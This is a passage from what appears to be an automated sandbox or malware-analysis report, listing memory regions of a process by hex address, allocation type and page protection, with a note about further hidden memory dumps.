trusted library allocation
page read and write
6E8000
heap
page read and write
324000
heap
page read and write
1005A000
unkown
page readonly
2647000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
26B5000
trusted library allocation
page read and write
36A6000
trusted library allocation
page read and write
30A0000
trusted library allocation
page read and write
30B5000
trusted library allocation
page read and write
30CB000
trusted library allocation
page read and write
20B1000
trusted library allocation
page read and write
26B5000
trusted library allocation
page read and write
46EB000
trusted library allocation
page read and write
2CEC000
trusted library allocation
page read and write
32FA000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
309E000
stack
page read and write
206A000
trusted library allocation
page read and write
4703000
trusted library allocation
page read and write
2636000
trusted library allocation
page read and write
23E0000
remote allocation
page read and write
3728000
trusted library allocation
page read and write
321E000
trusted library allocation
page read and write
22B4000
trusted library section
page readonly
2840000
trusted library allocation
page read and write
3481000
trusted library allocation
page read and write
384A000
trusted library allocation
page read and write
2E5B000
trusted library allocation
page read and write
2BBE000
heap
page read and write
317C000
trusted library allocation
page read and write
A13000
trusted library allocation
page read and write
24B000
stack
page read and write
3627000
trusted library allocation
page read and write
361F000
trusted library allocation
page read and write
2B5000
heap
page read and write
10057000
unkown
page read and write
226F000
trusted library allocation
page read and write
3501000
trusted library allocation
page read and write
260000
heap
page read and write
8920000
trusted library allocation
page read and write
30A0000
trusted library allocation
page read and write
10057000
unkown
page read and write
1C5D0000
heap
page read and write
3F7000
heap
page read and write
309E000
stack
page read and write
8A0000
trusted library allocation
page read and write
20D8000
trusted library allocation
page read and write
2647000
trusted library allocation
page read and write
3AD000
heap
page read and write
20B8000
trusted library allocation
page read and write
2094000
trusted library allocation
page read and write
240000
heap
page read and write
2CEC000
trusted library allocation
page read and write
23C0000
heap
page read and write
20B1000
trusted library allocation
page read and write
36F8000
trusted library allocation
page read and write
2E5B000
trusted library allocation
page read and write
2D47000
trusted library allocation
page read and write
20B8000
trusted library allocation
page read and write
34F9000
trusted library allocation
page read and write
401000
heap
page read and write
2647000
trusted library allocation
page read and write
30CB000
trusted library allocation
page read and write
3627000
trusted library allocation
page read and write
4703000
trusted library allocation
page read and write
20B8000
trusted library allocation
page read and write
361F000
trusted library allocation
page read and write
2BC9000
heap
page read and write
2E80000
trusted library allocation
page read and write
46EB000
trusted library allocation
page read and write
36F0000
trusted library allocation
page read and write
2A6000
heap
page read and write
E87E000
trusted library allocation
page read and write
20B1000
trusted library allocation
page read and write
34F7000
trusted library allocation
page read and write
46F4000
trusted library allocation
page read and write
5EF000
stack
page read and write
36F6000
trusted library allocation
page read and write
34AC000
trusted library allocation
page read and write
236F000
stack
page read and write
3F0000
heap
page read and write
10046000
unkown
page readonly
3280000
trusted library allocation
page read and write
20C6000
trusted library allocation
page read and write
26B5000
trusted library allocation
page read and write
1C6FE000
stack
page read and write
2B20000
heap
page read and write
20C6000
trusted library allocation
page read and write
2BB0000
heap
page read and write
372C000
stack
page read and write
29C3000
trusted library allocation
page read and write
13C000
stack
page read and write
2094000
trusted library allocation
page read and write
7EFE0000
unkown
page readonly
20B8000
trusted library allocation
page read and write
233000
trusted library allocation
page read and write
2B5A000
heap
page read and write
2CEC000
trusted library allocation
page read and write
1D74000
heap
page read and write
2840000
trusted library allocation
page read and write
2C84000
trusted library allocation
page read and write
40E000
heap
page read and write
46F4000
trusted library allocation
page read and write
30B3000
trusted library allocation
page read and write
107000
heap
page read and write
2075000
heap
page read and write
20C6000
trusted library allocation
page read and write
2094000
trusted library allocation
page read and write
20D8000
trusted library allocation
page read and write
3E5000
heap
page read and write
1AFA0000
trusted library allocation
page read and write
2CEC000
trusted library allocation
page read and write
2913000
trusted library allocation
page read and write
40B000
heap
page read and write
2B76000
heap
page read and write
2E5D000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
329000
heap
page read and write
2D33000
trusted library allocation
page read and write
3501000
trusted library allocation
page read and write
8DDE000
trusted library allocation
page read and write
46F4000
trusted library allocation
page read and write
20B1000
trusted library allocation
page read and write
749000
heap
page read and write
3B5000
heap
page read and write
3FE000
heap
page read and write
2D36000
trusted library allocation
page read and write
4703000
trusted library allocation
page read and write
361F000
trusted library allocation
page read and write
10000
heap
page read and write
34F4000
trusted library allocation
page read and write
2CEC000
trusted library allocation
page read and write
20B8000
trusted library allocation
page read and write
4703000
trusted library allocation
page read and write
2B2C000
heap
page read and write
6B95000
heap
page read and write
3501000
trusted library allocation
page read and write
34AC000
trusted library allocation
page read and write
87FE000
trusted library allocation
page read and write
271D000
stack
page read and write
5F19000
heap
page read and write
20B8000
trusted library allocation
page read and write
E87E000
trusted library allocation
page read and write
2CEC000
trusted library allocation
page read and write
2840000
trusted library allocation
page read and write
2840000
trusted library allocation
page read and write
46F4000
trusted library allocation
page read and write
30B0000
trusted library allocation
page read and write
382E000
trusted library allocation
page read and write
2E60000
trusted library allocation
page read and write
34D000
heap
page read and write
30CB000
trusted library allocation
page read and write
2D76000
heap
page read and write
AA000
stack
page read and write
34F2000
trusted library allocation
page read and write
361F000
trusted library allocation
page read and write
2560000
heap
page read and write
91DE000
trusted library allocation
page read and write
224D000
trusted library allocation
page read and write
920E000
trusted library allocation
page read and write
20C6000
trusted library allocation
page read and write
323B000
trusted library allocation
page read and write
32AD000
trusted library allocation
page read and write
2C10000
heap
page read and write
4703000
trusted library allocation
page read and write
26B5000
trusted library allocation
page read and write
498000
heap
page read and write
36FD000
trusted library allocation
page read and write
3B57000
trusted library allocation
page read and write
1CD2000
trusted library section
page read and write
34FB000
trusted library allocation
page read and write
2BD9000
heap
page read and write
E87E000
trusted library allocation
page read and write
2E5D000
trusted library allocation
page read and write
2D44000
trusted library allocation
page read and write
2AEF000
stack
page read and write
29C4000
trusted library allocation
page read and write
36A000
heap
page read and write
3474000
trusted library allocation
page read and write
91DE000
trusted library allocation
page read and write
1C7BE000
stack
page read and write
2230000
trusted library allocation
page read and write
8B0000
heap
page read and write
3B7000
heap
page read and write
2840000
trusted library allocation
page read and write
2840000
trusted library allocation
page read and write
2E5D000
trusted library allocation
page read and write
46F4000
trusted library allocation
page read and write
2BA1000
heap
page read and write
1D8000
heap
page read and write
225F000
trusted library allocation
page read and write
284000
heap
page read and write
32B0000
trusted library allocation
page read and write
3E5000
heap
page read and write
3627000
trusted library allocation
page read and write
30CB000
trusted library allocation
page read and write
2E5B000
trusted library allocation
page read and write
2B34000
heap
page read and write
2CEC000
trusted library allocation
page read and write
46F4000
trusted library allocation
page read and write
46EB000
trusted library allocation
page read and write
22BF000
trusted library section
page readonly
89EE000
trusted library allocation
page read and write
3474000
trusted library allocation
page read and write
20B8000
trusted library allocation
page read and write
34AC000
trusted library allocation
page read and write
3240000
stack
page read and write
1D70000
heap
page read and write
2FA000
heap
page read and write
8920000
trusted library allocation
page read and write
20B1000
trusted library allocation
page read and write
4703000
trusted library allocation
page read and write
32A7000
trusted library allocation
page read and write
2A50000
remote allocation
page read and write
30A0000
trusted library allocation
page read and write
317000
heap
page read and write
30CB000
trusted library allocation
page read and write
2BC9000
heap
page read and write
405000
heap
page read and write
2B32000
heap
page read and write
3870000
trusted library allocation
page read and write
There are 1457 hidden memdumps, click here to show them.